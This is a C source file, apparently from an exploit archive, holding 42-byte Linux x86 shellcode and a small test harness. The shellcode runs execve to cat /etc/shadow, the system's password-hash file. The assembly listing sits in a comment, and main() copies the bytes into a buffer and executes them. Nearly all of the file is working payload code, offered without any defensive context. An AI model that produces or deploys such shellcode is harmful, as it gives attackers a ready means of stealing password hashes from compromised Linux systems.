50 lines
No EOL
1.1 KiB
C
50 lines
No EOL
1.1 KiB
C
/*
|
|
* Title: linux/x86 execve(/bin/cat, /etc/shadow, NULL) - 42 bytes
|
|
* Type: Shellcode
|
|
* Author: antrhacks
|
|
* Platform: Linux X86
|
|
*/
|
|
|
|
/* ASSembly
|
|
31 c0 xor %eax,%eax
|
|
50 push %eax
|
|
68 2f 63 61 74 push $0x7461632f
|
|
68 2f 62 69 6e push $0x6e69622f
|
|
89 e3 mov %esp,%ebx
|
|
50 push %eax
|
|
68 61 64 6f 77 push $0x776f6461
|
|
68 2f 2f 73 68 push $0x68732f2f
|
|
68 2f 65 74 63 push $0x6374652f
|
|
89 e1 mov %esp,%ecx
|
|
50 push %eax
|
|
51 push %ecx
|
|
53 push %ebx
|
|
89 e1 mov %esp,%ecx
|
|
b0 0b mov $0xb,%al
|
|
cd 80
|
|
*/
|
|
|
|
int main(){
|
|
char shell[] =
|
|
"\x31\xc0"
|
|
"\x50"
|
|
"\x68\x2f\x63\x61\x74"
|
|
"\x68\x2f\x62\x69\x6e"
|
|
"\x89\xe3"
|
|
"\x50"
|
|
"\x68\x61\x64\x6f\x77"
|
|
"\x68\x2f\x2f\x73\x68"
|
|
"\x68\x2f\x65\x74\x63"
|
|
"\x89\xe1"
|
|
"\x50"
|
|
"\x51"
|
|
"\x53"
|
|
"\x89\xe1"
|
|
"\xb0\x0b"
|
|
"\xcd\x80";
|
|
|
|
printf("[*] Taille du ShellCode = %d\n", strlen(shell));
|
|
(*(void (*)()) shell)();
|
|
|
|
return 0;
|
|
} |